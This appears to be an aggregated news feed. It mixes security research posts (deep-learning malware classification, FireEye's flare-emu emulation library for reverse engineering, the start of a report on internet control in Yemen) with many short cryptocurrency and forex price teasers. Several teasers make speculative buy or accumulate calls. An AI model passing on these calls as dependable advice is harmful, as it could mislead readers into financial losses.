  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.

Cardano Price Analysis: ADA Moving Within A Deadly Range Block

ADA remains vulnerable to further downside pressure, and there is potential for another 50% drop. IOHK launch two new Cardano tools, ‘Plutus’ and Marlowe for smart contract writing. Cardano’s ADA price has been very much depressed for the past five weeks now, dropping well over 60% within this period. As a result, ADA/BTC it has […]

The post Cardano Price Analysis: ADA Moving Within A Deadly Range Block appeared first on Hacked: Hacking Finance.

Forex Update: Dollar Drops, Risk-On Currencies Rally on Trade Optimism

Forex Market Snapshot Asset Current Value Daily Change EUR/USD 1.1366 0.43% GBP/USD 1.2634 1.19% USD/JPY 113.25 -0.10% AUD/USD 0.7223 0.26% GOLD 1,249 0.09% WTI Crude Oil 52.16 0.37% BTC/USD 3,444 2.74% The forex market saw another very active session, with the key topics of the recent weeks still making headlines and causing wild swings in […]

The post Forex Update: Dollar Drops, Risk-On Currencies Rally on Trade Optimism appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: ZEC/USD Shaping Up for Another Potential Fall; Coinbase Giving Zcash Away

  Zcash saw a decent bounce on Wednesday, jumping over 6%, but technical there are still some vulnerabilities. Coinbase as part of their ‘12 days of Coinbase’ campaign, will be giving away ZEC to families in need in Venezuela. ZEC/USD enjoyed a string of gains on Wednesday, jumping as much as 6% in the session. […]

The post Zcash Price Analysis: ZEC/USD Shaping Up for Another Potential Fall; Coinbase Giving Zcash Away appeared first on Hacked: Hacking Finance.

Crypto Update: Another Rally Attempt in Crypto-Land

The major cryptocurrencies are all trading slightly higher today, following two bearish days that brought them back to last week lows, and for now, another breakdown has been avoided, despite the overwhelmingly bearish broader picture. The modest bounce left our trend model on sell signals across the board, and odds continue to favor new lows […]

The post Crypto Update: Another Rally Attempt in Crypto-Land appeared first on Hacked: Hacking Finance.

FLARE Script Series: Automating Objective-C Code Analysis with Emulation

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing a new IDAPython library – flare-emu – powered by IDA Pro and the Unicorn emulation framework that provides scriptable emulation features for the x86, x86_64, ARM, and ARM64 architectures to reverse engineers. Along with this library, we are also sharing an Objective-C code analysis IDAPython script that uses it. Read on to learn some creative ways that emulation can help solve your code analysis problems and how to use our new IDAPython library to save you lots of time in the process.

Why Emulation?

If you haven’t employed emulation as a means to solve a code analysis problem, then you are missing out! I will highlight some of its benefits and a few use cases in order to give you an idea of how powerful it can be. Emulation is flexible, and many emulation frameworks available today, including Unicorn, are cross-platform. With emulation, you choose which code to emulate and you control the context under which it is executed. Because the emulated code cannot access the system services of the operating system under which it is running, there is little risk of it causing damage. All of these benefits make emulation a great option for ad-hoc experimentation, problem solving, or automation.

Use Cases

  • Decoding/Decryption/Deobfuscation/Decompress – Often during malicious code analysis you will come across a function used to decode, decompress, decrypt, or deobfuscate some useful data such as strings, configuration data, or another payload. If it is a common algorithm, you may be able to identify it by sight or with a plug-in such as signsrch. Unfortunately, this is not often the case. You are then left to either opening up a debugger and instrumenting the sample to decode it for you, or transposing the function by hand into whatever programming language fits your needs at the time. These options can be time consuming and problematic depending on the complexity of the code and the sample you are analyzing. Here, emulation can often provide a preferable third option. Writing a script that emulates the function for you is akin to having the function available to you as if you wrote it or are calling it from a library. This allows you to reuse the function as many times as it’s needed, with varying inputs, without having to open a debugger. This case also applies to self-decrypting shellcode, where you can have the code decrypt itself for you.
  • Data Tracking – With emulation, you have the power to stop and inspect the emulation context at any time using an instruction hook. Pairing a disassembler with an emulator allows you to pause emulation at key instructions and inspect the contents of registers and memory. This allows you to keep tabs on interesting data as it flows through a function. This can have several applications. As previously covered in other blogs in the FLARE script series, Automating Function Argument Extraction and Automating Obfuscated String Decoding, this technique can be used to track the arguments passed to a given function throughout an entire program. Function argument tracking is one of the techniques employed by the Objective-C code analysis tool introduced later in this post. The data tracking technique could also be employed to track the this pointer in C++ code in order to markup object member references, or the return values from calls to GetProcAddress/dlsym in order to rename the variables they are stored in appropriately. There are many possibilities.

Introducing flare-emu

The FLARE team is introducing an IDAPython library, flare-emu, that marries IDA Pro’s binary analysis capabilities with Unicorn’s emulation framework to provide the user with an easy to use and flexible interface for scripting emulation tasks. flare-emu is designed to handle all the housekeeping of setting up a flexible and robust emulator for its supported architectures so that you can focus on solving your code analysis problems. It currently provides three different interfaces to serve your emulation needs, along with a slew of related helper and utility functions.

  1. emulateRange – This API is used to emulate a range of instructions, or a function, within a user-specified context. It provides options for user-defined hooks for both individual instructions and for when “call” instructions are encountered. The user can decide whether the emulator will skip over, or call into function calls. Figure 1 shows emulateRange used with both an instruction and call hook to track the return value of GetProcAddress calls and rename global variables to the name of the Windows APIs they will be pointing to. In this example, it was only set to emulate from 0x401514 to 0x40153D.  This interface provides an easy way for the user to specify values for given registers and stack arguments. If a bytestring is specified, it is written to the emulator’s memory and the pointer is written to the register or stack variable. After emulation, the user can make use of flare-emu’s utility functions to read data from the emulated memory or registers, or use the Unicorn emulation object that is returned for direct probing in case flare-emu does not expose some functionality you require.

    A small wrapper function for emulateRange, named emulateSelection, can be used to emulate the range of instructions currently highlighted in IDA Pro.


    Figure 1: emulateRange being used to track the return value of GetProcAddress

  2. iterate – This API is used to force emulation down specific branches within a function in order to reach a given target. The user can specify a list of target addresses, or the address of a function from which a list of cross-references to the function is used as the targets, along with a callback for when a target is reached. The targets will be reached, regardless of conditions during emulation that may have caused different branches to be taken. Figure 2 illustrates a set of code branches that iterate has forced to be taken in order to reach its target; the flags set by the cmp instructions are irrelevant.  Like the emulateRange API, options for user-defined hooks for both individual instructions and for when “call” instructions are encountered are provided. An example use of the iterate API is for the function argument tracking technique mentioned earlier in this post.


    Figure 2: A path of emulation determined by the iterate API in order to reach the target address

  3. emulateBytes – This API provides a way to simply emulate a blob of extraneous shellcode. The provided bytes are not added to the IDB and are simply emulated as is. This can be useful for preparing the emulation environment. For example, flare-emu itself uses this API to manipulate a Model Specific Register (MSR) for the ARM64 CPU that is not exposed by Unicorn in order to enable Vector Floating Point (VFP) instructions and register access. Figure 3 shows the code snippet that achieves this. Like with emulateRange, the Unicorn emulation object is returned for further probing by the user in case flare-emu does not expose some functionality required by the user.


    Figure 3: flare-emu using emulateBytes to enable VFP for ARM64

API Hooking

As previously stated, flare-emu is designed to make it easy for you to use emulation to solve your code analysis needs. One of the pains of emulation is in dealing with calls into library functions. While flare-emu gives you the option to simply skip over call instructions, or define your own hooks for dealing with specific functions within your call hook routine, it also comes with predefined hooks for over 80 functions! These functions include many of the common C runtime functions for string and memory manipulation that you will encounter, as well as some of their Windows API counterparts.

Examples

Figure 4 shows a few blocks of code that call a function that takes a timestamp value and converts it to a string. Figure 5 shows a simple script that uses flare-emu’s iterate API to print the arguments passed to this function for each place it is called. The script also emulates a simple XOR decode function and prints the resulting, decoded string. Figure 6 shows the resulting output of the script.


Figure 4: Calls to a timestamp conversion function


Figure 5: Simple example of flare-emu usage


Figure 6: Output of script shown in Figure 5

Here is a sample script that uses flare-emu to track return values of GetProcAddress and rename the variables they are stored in accordingly. Check out our README for more examples and help with flare-emu.

Introducing objc2_analyzer

Last year, I wrote a blog post to introduce you to reverse engineering Cocoa applications for macOS. That post included a short primer on how Objective-C methods are called under the hood, and how this adversely affects cross-references in IDA Pro and other disassemblers. An IDAPython script named objc2_xrefs_helper was also introduced in the post to help fix these cross-references issues. If you have not read that blog post, I recommend reading it before continuing on reading this post as it provides some context for what makes objc2_analyzer particularly useful. A major shortcoming of objc2_xrefs_helper was that if a selector name was ambiguous, meaning that two or more classes implement a method with the same name, the script was unable to determine which class the referenced selector belonged to at any given location in the binary and had to ignore such cases when fixing cross-references.

Now, with emulation support, this is no longer the case. objc2_analyzer uses the iterate API from flare-emu along with instruction and call hooks that perform Objective-C disassembly analysis in order to determine the id and selector being passed for every call to objc_msgSend variants in a binary. As an added bonus, it can also catch calls made to objc_msgSend variants when the function pointer is stored in a register, which is a very common pattern in Clang (the compiler used by modern versions of Xcode). IDA Pro tries to catch these itself and does a pretty good job, but it doesn’t catch them all. In addition to x86_64, support was also added for the ARM and ARM64 architectures in order to support reverse engineering iOS applications. This script supersedes the older objc2_xrefs_helper script, which has been removed from our repo. And, since the script can perform such data tracking in Objective-C code by using emulation, it can also determine whether an id is a class instance or a class object itself. Additional support has been added to track ivars being passed as ids as well. With all this information, Objective-C-style pseudocode comments are added to each call to objc_msgSend variants that represent the method call being made at each location. An example of the script’s capability is shown in Figure 7 and Figure 8.


Figure 7: Objective-C IDB snippet before running objc2_analyzer


Figure 8: Objective-C IDB snippet after running objc2_analyzer

Observe the instructions referencing selectors have been patched to instead reference the implementation function itself, for easy transition. The comments added to each call make analysis much easier. Cross-references from the implementation functions are also created to point back to the objc_msgSend calls that reference them as shown in Figure 9.


Figure 9: Cross-references added to IDB for implementation function

It should be noted that every release of IDA Pro starting with 7.0 have brought improvements to Objective-C code analysis and handling. However, at the time of writing, the latest version of IDA Pro being 7.2, there are still shortcomings that are mitigated using this tool as well as the immensely helpful comments that are added. objc2_analyzer is available, along with our other IDA Pro plugins and scripts, at our GitHub page.

Conclusion

flare-emu is a flexible tool to include in your arsenal that can be applied to a variety of code analysis problems. Several example problems were presented and solved using it in this blog post, but this is just a glimpse of its possible applications. If you haven’t given emulation a try for solving your code analysis problems, we hope you will now consider it an option. And for all, we hope you find value in using these new tools!

NEM Update: Good Time to Buy the Dip

What would you think if we told you that NEM (XEM/BTC) is a crypto leader in terms of chart analysis? Many would think that this statement is preposterous. After all, the market is still down by 85% from the 2018 peak of 0.000137. In September, it was even down further by over 90% when it […]

The post NEM Update: Good Time to Buy the Dip appeared first on Hacked: Hacking Finance.

EOS Price Analysis: Cardano Founder Charles Hoskinson Warns of Regulatory Action Against EOS

Charles Hoskinson projects some form of action from the SEC on EOS. EOS/USD enjoys a relief rally on Wednesday, as price moves further north following recent bounce. The EOS price hasn’t done much but decline of late. Back in August, EOS/USD entered into a very stubborn narrowing range. The price had been confined within this […]

The post EOS Price Analysis: Cardano Founder Charles Hoskinson Warns of Regulatory Action Against EOS appeared first on Hacked: Hacking Finance.

Forex Update: Euro and Pound Under Pressure Amid Brexit Chaos

Forex Market Snapshot Asset Current Value Daily Change EUR/USD 1.1318 -0.32% GBP/USD 1.2515 -0.35% USD/JPY 113.27 -0.04% AUD/USD 0.7200 0.14% GOLD 1,247 -0.23% WTI Crude Oil 51.63 1.43% BTC/USD 3,336 -2.10% The forex market has been very active today with Europe being in the epicenter of the moves. The Euro and the Great British Pound […]

The post Forex Update: Euro and Pound Under Pressure Amid Brexit Chaos appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD on the Road to Losing the $0.10 Mark; Coinbase Can’t Save XLM for Now

XLM bears are pressing hard for a drop below the big $0.10 mark, as markets remains down across the board. There could be room for another 8% price drop if support is broken, looking via the XLM/BTC chart view. Stellar’s XLM is subject to giving up the big $0.10 level. Across the board there have […]

The post Stellar Price Analysis: XLM/USD on the Road to Losing the $0.10 Mark; Coinbase Can’t Save XLM for Now appeared first on Hacked: Hacking Finance.

Crypto Update: New Lows in Sight Again as Slide Continues

The cryptocurrency segment continues to be under heavy selling pressure following the weekend rally attempt, and although all of the majors are still above last week’s lows, the strong short-term downtrend remains dominant. The long-term picture is overwhelmingly bearish as well, and there are coins showing meaningful relative strength, so sellers are clearly still clearly […]

The post Crypto Update: New Lows in Sight Again as Slide Continues appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD is a Sitting Duck Under $100; with Jitters Heading into Constantinople Upgrade

ETH/USD is subject to further downside, as the price produces another range-block. There is some nervous anticipation across the community heading into the Constantinople upgrade. ETH/USD is a sitting duck underneath the big psychological $100 mark. Just like every other cryptocurrency, Ethereum (ETH) remains firmly on the back foot. Over the past five weeks, the […]

The post Ethereum Price Analysis: ETH/USD is a Sitting Duck Under $100; with Jitters Heading into Constantinople Upgrade appeared first on Hacked: Hacking Finance.

Crypto Update: Weekend Bounce Fails to Turn Bearish Tide

The major cryptocurrencies continue to be stuck in declining trends, despite the bounce that followed the latest technical breakdown in the segment. The top coins failed to recover above the prior bear market lows sustainably, and today, the market turned lower again, with the weakest currencies already threatening with new lows. The long-term picture remains […]

The post Crypto Update: Weekend Bounce Fails to Turn Bearish Tide appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: If Current Demand Zone Fails to Hold Then Next Stop Is $3

LTC/USD is at serious danger of another hard fall should the range-block seen be breached. Back in December 2013, the price was at current levels and fell down to $1 over a two-year period. Litecoin has been heavily weighted to the downside of late. The selling pressure intensified through the month of November. This month, […]

The post Litecoin Price Analysis: If Current Demand Zone Fails to Hold Then Next Stop Is $3 appeared first on Hacked: Hacking Finance.

USD Has Found Itself Among Outsiders

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets There are a lot of factors weighing on the US dollar as of late. EURUSD skyrocketed towards the highs it reached on November 20th, as the currency market was overwhelmed by another wave of “escaping-from-the American-currency” investors. It wouldn’t be right to say that there was one particular […]

The post USD Has Found Itself Among Outsiders appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD Behavior Suggests of One More Deep Pullback

XRP/USD price action is moving within a range-block, subject to an extended move lower. American Express are singing praises above the speed of Ripple’s technology. XRP/USD price has stabilized, after the renewed chunky wave of selling pressure that hit the market. The price last week was forced to drop a whopping 30%. This came following […]

The post XRP Price Analysis: XRP/USD Behavior Suggests of One More Deep Pullback appeared first on Hacked: Hacking Finance.

Dash Price Analysis: DASH Sees Change in Sentiment, with Help from KFC Adoption Announcement

KFC to start accepting DASH payments in Venezula, as adoption across the country continues. DASH/USDT has seen a firm bounce, producing a daily hammer candlestick, indicating of a reversal on the cards. DASH/USDT has bounced over the past three sessions, a promising change from the bearish sentiment seen. Through the month of November, which was […]

The post Dash Price Analysis: DASH Sees Change in Sentiment, with Help from KFC Adoption Announcement appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: ADA Subject to Further Downside, Despite Charles Hoskinson Singing Praises of Progress

Cardano founder, Charles Hoskinson, said, “Cardano’s future is looking very bright!” in a tweet update. ADA/USDT is back within consolidation mode, ahead of another potential squeeze to the downside. Cardano’s native token ADA remains under heavy pressure to the downside. The pick in momentum lower, which came in November, has seen the price fall over 60%. […]

The post Cardano Price Analysis: ADA Subject to Further Downside, Despite Charles Hoskinson Singing Praises of Progress appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD Spikes 17% as Constantinople Set to Launch in Jan; $60 Still in Sight

Ethereum developers report that Constantinople hard fork is estimated on 16th January 2019. ETH/USD could be driven down further to May 2017 low, around the $60 territory. Constantinople Set for January Implementation ETH/USD in the late part of trading on Friday surged some chunky 17%. An update on the highly anticipated Constantinople hard fork launch […]

The post Ethereum Price Analysis: ETH/USD Spikes 17% as Constantinople Set to Launch in Jan; $60 Still in Sight appeared first on Hacked: Hacking Finance.

Crypto Update: Sell-Off Deepens as Majors Break Key Levels

The past 24 hours saw another crucial bearish move in the cryptocurrency segment, with the majority of the top coins violating their prior bear market lows and starting another leg lower in the damaging downtrend. Even the relatively stronger coins turned bearish in our trend model with regards to the short-term time-frame while staying bearish […]

The post Crypto Update: Sell-Off Deepens as Majors Break Key Levels appeared first on Hacked: Hacking Finance.

Bitcoin Update: Bear Market Bottom Ahead

Bitcoin (BTC/USD), as well as most cryptos, are getting wrecked as we speak. Many are panic selling as the market is down by close to 50% in less than a month. On top of that, it seems that a fresh yearly low is printed with every passing minute. Bears look unstoppable as calls for Bitcoin’s […]

The post Bitcoin Update: Bear Market Bottom Ahead appeared first on Hacked: Hacking Finance.

Tron Price Analysis: Justin Sun Makes Offer to EOS and ETH Developers; TRX/USD Outperforms

TRX has been outperforming its peers in the session on Friday, within a sea of red. Tron founder Justin Sun makes an offer to EOS and ETH developers. The Tron price is witnessing decent bounce to the upside in comparison to many of its peers. Gains of some 3% in the session on Friday have […]

The post Tron Price Analysis: Justin Sun Makes Offer to EOS and ETH Developers; TRX/USD Outperforms appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD Finally Approaching the Real Big Bull Buying Levels

XRP/USD tanks to drop below $0.3000 mark, lowest level since September. Eyes are on the big bull buying area of $0.3000-$0.2000. Historically has proven to see large interest come into play at this level. XRP/USD was slammed aggressively this week, as selling pressure heavily intensified late Thursday into Friday. The market resuming the chunky downside […]

The post XRP Price Analysis: XRP/USD Finally Approaching the Real Big Bull Buying Levels appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD Bears Tear Through Critical Support

XLM/USD has recent bottom area breached firmly by the market bears. XLM/BTC suggests there is still some further room for another squeeze to the downside. Stellar Lumens is really heading to no man’s land. XLM/USD is running at its fifth consecutive session in the red, dropping a chunky 25% within this period. The selling pressure […]

The post Stellar Price Analysis: XLM/USD Bears Tear Through Critical Support appeared first on Hacked: Hacking Finance.

Crypto Update: Altcoins Remain Under Pressure as Bitcoin Holds Support

The cryptocurrency segment continues to trade with a bearish bias, with almost all majors challenging their bear market lows in the past 24 hours. While a broad breakdown has been avoided so far, in the case of the top coins, there is still no sign of meaningful bullish momentum or a developing leadership, so odds […]

The post Crypto Update: Altcoins Remain Under Pressure as Bitcoin Holds Support appeared first on Hacked: Hacking Finance.

Ethereum Update: Santa Rally Possibly in the Works

Ethereum (ETH/BTC) is down by over 77% from the 2018 high of 0.12282435 in February 2018. At that point, the market has plummeted so deeply that we’ve reached whale territory. Ethereum is trading at price levels where high roller wallets are on the move. On November 30 alone, more than half a billion dollars worth […]

The post Ethereum Update: Santa Rally Possibly in the Works appeared first on Hacked: Hacking Finance.

Maker Price Analysis: MKR/USD Jumps 6%, While Rest of the Market Slumps

Maker is outperforming most of its peers with the recent gains produced. The surge higher has put MKR into the top 20 cryptocurrencies by market cap. Maker (MKR) initially made solid gains as much as 6% on Tuesday before cooling. This move was very much out-performing the rest of the market. This being part of […]

The post Maker Price Analysis: MKR/USD Jumps 6%, While Rest of the Market Slumps appeared first on Hacked: Hacking Finance.

Bitcoin Cash Price Analysis: BCH/USD Tumbles Further into the Abyss, and Not Even Roger Ver Can Save it

BCH/USD has broken the recent bottom area of $150, making room for another wave of selling. Roger Ver, speaking to Bloomberg in Tokyo, was bullish on the long-term fundamentals of cryptocurrencies in general. The Bitcoin Cash price continues to get slammed by the market bears, with a lack of mercy being shown. BCH/USD is currently […]

The post Bitcoin Cash Price Analysis: BCH/USD Tumbles Further into the Abyss, and Not Even Roger Ver Can Save it appeared first on Hacked: Hacking Finance.

Crypto Update: Bitcoin Eyes $4000 as Consolidation Continues

The crypto-segment is having a positive day so far today, with the top coins all being higher, recovering a large part of yesterday’ s losses. While the major cryptocurrencies still don’t show signs of strong bullish momentum, and the market is clearly controlled by sellers, the declining volatility of the recent period is an encouraging […]

The post Crypto Update: Bitcoin Eyes $4000 as Consolidation Continues appeared first on Hacked: Hacking Finance.

IOTA Price Analysis: IOTA Announce Another New Partnership, but Bulls Must Breakout from Bearish Set-Up

IOTA announces new collaboration with RIDDLE&CODE for transactions on IOTA Tangle. Bearish technical set up is still eyed for IOT/USD; bulls must breakout, or be punished. IOTA Collaborates RIDDLE&CODE A new partnership has recently been announced from the IOTA Foundation with RIDDLE&CODE, a blockchain-based hardware and software company. This collaboration is set to facilitate transactions […]

The post IOTA Price Analysis: IOTA Announce Another New Partnership, but Bulls Must Breakout from Bearish Set-Up appeared first on Hacked: Hacking Finance.

General Motors Fires 27,000 People, Stock Jumps by 5%

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets In early November, we commented on GM, arguing that the stock may reach $40. Not much time has passed, and yet many key events occurred, which increased the volatility in General Motors’ stock. Currently, any major rise is unlikely, as Donald Trump is now taking part in this. […]

The post General Motors Fires 27,000 People, Stock Jumps by 5% appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Struggle to Gain Momentum as Sellers Remain in Control

Despite the recovery during the weekend, the major cryptocurrencies failed to gain substantial ground, with even the relatively stronger coins getting stuck below their recent short-term swing highs. Most of the top coins are now back below their initial panic lows, and despite the recent stability and the strength in some of the coins, the […]

The post Crypto Update: Coins Struggle to Gain Momentum as Sellers Remain in Control appeared first on Hacked: Hacking Finance.

Tron Price Analysis: Despite Hard Fall, TRX/USD Forming a Bullish Flag Pattern

The TRX/USD price is under pressure after the big 48% bull run seen last week. Justin Sun goes head to head with Ethereum’s Vitalik Buterin, boasting of huge transaction volume. Tron Ecosystem Growth Tron continues to see solid growth, with data to back it up. The foundation’s Dapp ecosystem is expanding in a strong and […]

The post Tron Price Analysis: Despite Hard Fall, TRX/USD Forming a Bullish Flag Pattern appeared first on Hacked: Hacking Finance.

Pound Still Sensitive to Brexit Talks

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets The hardest times are ahead of the British Pound. On December 11th, there will be a vote in the British Houses of Parliament on the Brexit agreement with the European Union and the results will directly influence the entire exit strategy – i.e., “hard” or “soft”. The “soft” […]

The post Pound Still Sensitive to Brexit Talks appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: Is this a Bottoming or Set-up for Another Deep Drop?

ETH/USD price does not appear to be out of danger yet, given current technical set up possibilities. For greater buying pressure to be seen, the bulls must break $130 to the upside. ETH/USD price action continues to show little signs of commitment, from either the bear or bull camps. Since the hard selling from 7th […]

The post Ethereum Price Analysis: Is this a Bottoming or Set-up for Another Deep Drop? appeared first on Hacked: Hacking Finance.

Crypto Update: Bitcoin Leads Weekend Recovery as Consolidation Continues

The major cryptocurrencies started the weekend in a positive fashion, recovering from yesterday’s selloff and stabilizing the short-term technical patterns. The current consolidation kept the possible failed breakdown formation in play in the case of the relatively stronger coins, such as Bitcoin and Litecoin, and although the bearish long-term picture is still not in any […]

The post Crypto Update: Bitcoin Leads Weekend Recovery as Consolidation Continues appeared first on Hacked: Hacking Finance.

Forex Analysis and Chartbook: Euro Plunges as Markets Turn Choppy Ahead of G20 Summit

Friday Market Snapshot Asset Current Value Daily Change S&P 500 2,752 0.36% DAX 30 11,257 -0.36% WTI Crude Oil 50.62 -1.25% GOLD 1,220 -0.29% Bitcoin 3,967 -6.63% EUR/USD 1.1311 -0.71% Traditional financial markets turned as choppy as it was expected ahead of the event that could shape the coming months in most assets classes. The […]

The post Forex Analysis and Chartbook: Euro Plunges as Markets Turn Choppy Ahead of G20 Summit appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Pull Back Following Strongest Rally in Weeks

The cryptocurrency segment is seeing red once again today following the strongest rally attempt since the structural breakdown in Bitcoin, which led to a damaging leg lower in the ongoing bear market. The major coins are all pulled back from their recent swing highs, and most of them dipped back below last week’s initial panic […]

The post Crypto Update: Coins Pull Back Following Strongest Rally in Weeks appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM Overtakes Bitcoin Cash After 25% Bull Run

XLM sees ‘flippening’ of Bitcoin Cash, moving to the fourth largest coin by market cap. Bull run cools after running into a new area of resistance around the former demand zone. The XLM/USD pair between the 27-29th November was making strong progress to the upside, having gained a chunky 25% within that period. This came […]

The post Stellar Price Analysis: XLM Overtakes Bitcoin Cash After 25% Bull Run appeared first on Hacked: Hacking Finance.

Litecoin Update: Good Time to Accumulate

The 2018 bear market has devalued many altcoins by over 70%. Litecoin (LTC/BTC) is part of that list. From the 2018 high of 0.025, the market dropped by as much as 71.78% as of November 19 when it touched a low of 0.007055. At that point, it looked like the market has more room to […]

The post Litecoin Update: Good Time to Accumulate appeared first on Hacked: Hacking Finance.

Tron Price Analysis: TRON to Launch Gaming Fund Worth $100 Million; TRX/USD Cools from Recent Surge

  The Tron foundation are set to launch a $100 million gaming fund, ‘Tron Arcade’. TRX/USD bulls have run out of steam for now, after entering into a new area of resistance. TRX/USD has been a huge out-performer of late, having racked up 50% worth of gains. The rally of the price began after a […]

The post Tron Price Analysis: TRON to Launch Gaming Fund Worth $100 Million; TRX/USD Cools from Recent Surge appeared first on Hacked: Hacking Finance.

Pre-Market Analysis And Chartbook: Commodities Gain, Dollar Declines Following Powell’s Dovish Shift

Thursday Market Snapshot Asset Current Value Daily Change S&P 500 2,739 -0.09% DAX 30 11,298 -0.01% WTI Crude Oil 52.14 3.65% GOLD 1,223 0.20% Bitcoin 4,253 0.75% EUR/USD 1.1374 0.08% We are having another tumultuous day in financial markets, with risk assets trading without a clear direction after yesterday surge in US stocks. Fed Chair […]

The post Pre-Market Analysis And Chartbook: Commodities Gain, Dollar Declines Following Powell’s Dovish Shift appeared first on Hacked: Hacking Finance.

XRP Price Analysis: XRP/USD Pulls Back for the Potential of Greater Upside

  XRP/USD cooled marginally on Thursday to make way for a further bull run. The price completed a technical move, breaking out and then retesting a pennant structure.  XRP/USD cooled during the session on Thursday, after a decent run of gains seen in the week so far. The price was seen down a marginal 3%, […]

The post XRP Price Analysis: XRP/USD Pulls Back for the Potential of Greater Upside appeared first on Hacked: Hacking Finance.

Crypto Update: Coins Extend Bounce as Selling Pressure Eases

The top cryptocurrencies continue to trade with a bullish short-term bias, and thanks to the two-day rally, the technical picture improved across the board. The odds of a failed breakdown pattern increased in the segment, with Bitcoin clearly recovering above the prior low, joining Litecoin in the move, even as most of the major altcoins […]

The post Crypto Update: Coins Extend Bounce as Selling Pressure Eases appeared first on Hacked: Hacking Finance.

Zcash Price Analysis: ZEC/USD Jumps 30% in Recovery as Foundation Teases Reference Wallet Design

  ZEC/USD bulls are making a strong case for recovery, as price makes 30% advance. Zcash foundation teases the design concepts of its awaited reference wallet. ZEC/USD is on a strong road to recovery following the latest bottom. The price has gained over 30% after the sellers became very much exhausted. A drop of around […]

The post Zcash Price Analysis: ZEC/USD Jumps 30% in Recovery as Foundation Teases Reference Wallet Design appeared first on Hacked: Hacking Finance.

Bitcoin Had a Big 15% Bounce to $4,300 But Traders Aren’t Convinced of Bull Run

Over the past 24 hours, the price of Bitcoin (BTC) surged from $3,771 to $4,355, by more than 15.4 percent, against the U.S. dollar. The volume of the dominant cryptocurrency spiked from around $5 billion to $7.2 billion, as large buy orders were filled by major fiat-to-cryptocurrency exchanges like Coinbase and Bitstamp. Bitcoin recorded the […]

The post Bitcoin Had a Big 15% Bounce to $4,300 But Traders Aren’t Convinced of Bull Run appeared first on Hacked: Hacking Finance.

Ethereum Price Analysis: ETH/USD Bullish Breakout from Descending Channel

The ETH/USD bulls forced a breakout to the upside from a descending channel formation. The next barrier is eyed within the $130 territory, further north eyes would be on $150. ETH/USD is on its way to the north following a convincing recovery on Wednesday. This comes after a bottom had formed ahead of the big […]

The post Ethereum Price Analysis: ETH/USD Bullish Breakout from Descending Channel appeared first on Hacked: Hacking Finance.

Pre-Market Analysis and Chartbook: US Stocks Remain Stable Ahead of Key Events

Wednesday Market Snapshot Asset Current Value Daily Change S&P 500 2,687 0.06% DAX 30 11,300 -0.07% WTI Crude Oil 51.09 -1.92% GOLD 1,213 -0.13% Bitcoin 4,194 11.28% EUR/USD 1.1276 -0.09% Financial markets are mixed with a slight positive bias amid the continued trade confusion, with investors trying to guess the likelihood of, at least, a […]

The post Pre-Market Analysis and Chartbook: US Stocks Remain Stable Ahead of Key Events appeared first on Hacked: Hacking Finance.

Bitcoin Gold Update: Shows Profit Potential

Just like many altcoins, Bitcoin Gold (BTG/BTC) was in a downtrend for most of 2018. It generated a 2018 high of 0.0317 on January 13. From there, the market got trapped in a brutal downward spiral. It nosedived to as low as 0.002336 on August 14. At that point, Bitcoin Gold was down by over […]

The post Bitcoin Gold Update: Shows Profit Potential appeared first on Hacked: Hacking Finance.

Underlying Dimensions of Yemen’s Civil War: Control of the Internet

Insikt Group

Scope Note: Sources of this research include the Recorded Future platform, Recorded Future malware detonation, the findings and methods from the Citizen Lab, Shodan, VirusTotal, Censys, ReversingLabs, and third-party metadata. Recorded Future would like to thank Rapid7 and their National Exposure Index in helping quantify the current IP landscape in Yemen. Recorded Future would also like to thank Joe Sandbox for the use of their product to analyze Android device malware samples.

Executive Summary

In the midst of the ongoing Yemeni civil war, local and international players are waging a secondary war through internet control and other cyber means. Recorded Future’s Insikt Group assesses that dynamics of the Yemeni civil war are manifesting themselves online through a struggle over Yemeni access, use, and control of the internet. Recorded Future identified both censorship controls and traffic attempting to subvert those controls within Yemen, as well as spyware activity. This report intends to establish a baseline of internet activity, use, and access in Yemen.

Key Judgments

